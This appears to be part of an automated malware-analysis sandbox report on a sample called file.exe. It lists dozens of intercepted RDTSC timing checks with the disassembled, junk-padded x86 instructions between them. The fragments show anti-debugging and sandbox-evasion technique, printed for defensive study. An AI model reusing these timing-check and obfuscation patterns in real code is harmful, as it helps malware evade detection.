                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA991 second address: AEA99E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9A84 second address: AE9A90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F4A80B11C36h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9A90 second address: AE9AAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F4A81237CD2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9AAC second address: AE9AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9DA2 second address: AE9DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A81237CCBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9EE9 second address: AE9F1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C43h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4A80B11C47h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9F1D second address: AE9F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A81237CCCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA06D second address: AEA08A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A80B11C46h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA08A second address: AEA0AE instructions: 0x00000000 rdtsc 0x00000002 je 00007F4A81237CDCh 0x00000008 jg 00007F4A81237CC6h 0x0000000e jmp 00007F4A81237CD0h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA0AE second address: AEA0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA221 second address: AEA22F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F4A81237CC6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AECFF5 second address: 971E72 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4A80B11C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 46C89D33h 0x00000012 push dword ptr [ebp+122D13E1h] 0x00000018 call 00007F4A80B11C3Ch 0x0000001d mov di, D720h 0x00000021 pop esi 0x00000022 or ch, FFFFFFA1h 0x00000025 call dword ptr [ebp+122D1983h] 0x0000002b pushad 0x0000002c jmp 00007F4A80B11C3Eh 0x00000031 xor eax, eax 0x00000033 mov dword ptr [ebp+122D1A52h], eax 0x00000039 mov dword ptr [ebp+122D1A52h], esi 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 xor dword ptr [ebp+122D1941h], esi 0x00000049 sub dword ptr [ebp+122D1941h], edx 0x0000004f mov dword ptr [ebp+122D2D78h], eax 0x00000055 jns 00007F4A80B11C3Dh 0x0000005b mov esi, 0000003Ch 0x00000060 cld 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 jl 00007F4A80B11C3Eh 0x0000006b jng 00007F4A80B11C38h 0x00000071 pushad 0x00000072 popad 0x00000073 lodsw 0x00000075 cmc 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D19A8h], esi 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jmp 00007F4A80B11C43h 0x00000089 nop 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d jns 00007F4A80B11C36h 0x00000093 push esi 0x00000094 pop esi 0x00000095 popad 0x00000096 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED054 second address: AED0C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e jno 00007F4A81237CC8h 0x00000014 popad 0x00000015 nop 0x00000016 or ecx, dword ptr [ebp+122D2A74h] 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D2A88h], ecx 0x00000024 push D9311FDDh 0x00000029 jmp 00007F4A81237CCBh 0x0000002e add dword ptr [esp], 26CEE0A3h 0x00000035 pushad 0x00000036 mov edi, dword ptr [ebp+122D2AA7h] 0x0000003c sub dword ptr [ebp+122D374Ah], ebx 0x00000042 popad 0x00000043 push 00000003h 0x00000045 xor ch, 00000050h 0x00000048 push 00000000h 0x0000004a xor ecx, dword ptr [ebp+122D2F4Ch] 0x00000050 push 00000003h 0x00000052 call 00007F4A81237CCAh 0x00000057 mov dword ptr [ebp+122D194Ah], edi 0x0000005d pop edi 0x0000005e push BB79A6C2h 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED2B7 second address: AED2C1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4A80B11C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED2C1 second address: AED2C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED2C6 second address: AED2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jng 00007F4A80B11C3Eh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E8FF second address: B0E90E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CAC8 second address: B0CAD6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CAD6 second address: B0CADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CADA second address: B0CAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A80B11C43h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CED7 second address: B0CEEC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jl 00007F4A81237CC6h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CEEC second address: B0CEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0D1C5 second address: B0D1D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0D1D1 second address: B0D1ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F4A80B11C3Eh 0x0000000b pushad 0x0000000c jg 00007F4A80B11C36h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0D369 second address: B0D3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4A81237CC6h 0x0000000a popad 0x0000000b jmp 00007F4A81237CD0h 0x00000010 pushad 0x00000011 jc 00007F4A81237CC6h 0x00000017 jl 00007F4A81237CC6h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jng 00007F4A81237CCEh 0x00000029 pushad 0x0000002a popad 0x0000002b jg 00007F4A81237CC6h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0D8CF second address: B0D8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0D8D3 second address: B0D8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B04AF4 second address: B04AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4A80B11C36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DA92 second address: B0DAAE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4A81237CC6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4A81237CCEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DAAE second address: B0DAC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C3Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DAC8 second address: B0DACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DACE second address: B0DAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E0D6 second address: B0E0F5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4A81237CC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F4A81237CD3h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E0F5 second address: B0E0FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E0FD second address: B0E101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E37D second address: B0E381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E4B9 second address: B0E4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E4BD second address: B0E4C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E4C1 second address: B0E4D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4A81237CC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E4D1 second address: B0E4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E4D5 second address: B0E4F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E4F1 second address: B0E523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007F4A80B11C47h 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop eax 0x00000012 push ecx 0x00000013 jmp 00007F4A80B11C3Ah 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E7AF second address: B0E7B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE396F second address: AE39A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007F4A80B11C47h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F4A80B11C3Fh 0x00000012 pop eax 0x00000013 push ebx 0x00000014 jmp 00007F4A80B11C41h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11620 second address: B11628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B145DA second address: B145E4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4A80B11C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B145E4 second address: B14619 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F4A81237CD8h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 jnc 00007F4A81237CC6h 0x00000017 jp 00007F4A81237CC6h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B14619 second address: B1461D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B14858 second address: B14866 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F4A81237CC6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AD1C second address: B1AD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AD22 second address: B1AD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AD2C second address: B1AD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AD32 second address: B1AD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AD3B second address: B1AD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AD3F second address: B1AD6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a ja 00007F4A81237CE1h 0x00000010 push esi 0x00000011 jmp 00007F4A81237CD3h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AEBF second address: B1AED6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C43h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AED6 second address: B1AEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4A81237CD7h 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F4A81237CC6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B167 second address: B1B180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A80B11C45h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B303 second address: B1B311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B311 second address: B1B34D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4A80B11C47h 0x00000008 jmp 00007F4A80B11C3Bh 0x0000000d jmp 00007F4A80B11C45h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B34D second address: B1B36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4A81237CD9h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B4B0 second address: B1B4ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C3Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F4A80B11C41h 0x00000013 pop ecx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4A80B11C41h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B4ED second address: B1B4F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B4F3 second address: B1B4F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1DBE1 second address: B1DBE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E195 second address: B1E1A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F4A80B11C36h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E1A7 second address: B1E1AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E6BD second address: B1E6C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E774 second address: B1E778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E778 second address: B1E7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4A80B11C49h 0x0000000b popad 0x0000000c nop 0x0000000d xor esi, 2A426580h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4A80B11C45h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E7B9 second address: B1E7BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1EC9B second address: B1ECE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F4A80B11C38h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov esi, edi 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+122D2D60h] 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1ECE1 second address: B1ECE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1ECE8 second address: B1ECEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1ECEE second address: B1ECF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1ECF2 second address: B1ED0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007F4A80B11C3Fh 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F5B8 second address: B1F5C2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1FDC5 second address: B1FDCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20E41 second address: B20E53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22A07 second address: B22A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22A0D second address: B22A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B230F7 second address: B230FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B230FC second address: B2313C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F4A81237CC8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 movzx esi, ax 0x00000027 push 00000000h 0x00000029 add edi, 0E395FC0h 0x0000002f xchg eax, ebx 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push esi 0x00000034 pop esi 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2313C second address: B23159 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4A80B11C43h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23A55 second address: B23A6A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4A81237CCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23A6A second address: B23A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A80B11C43h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
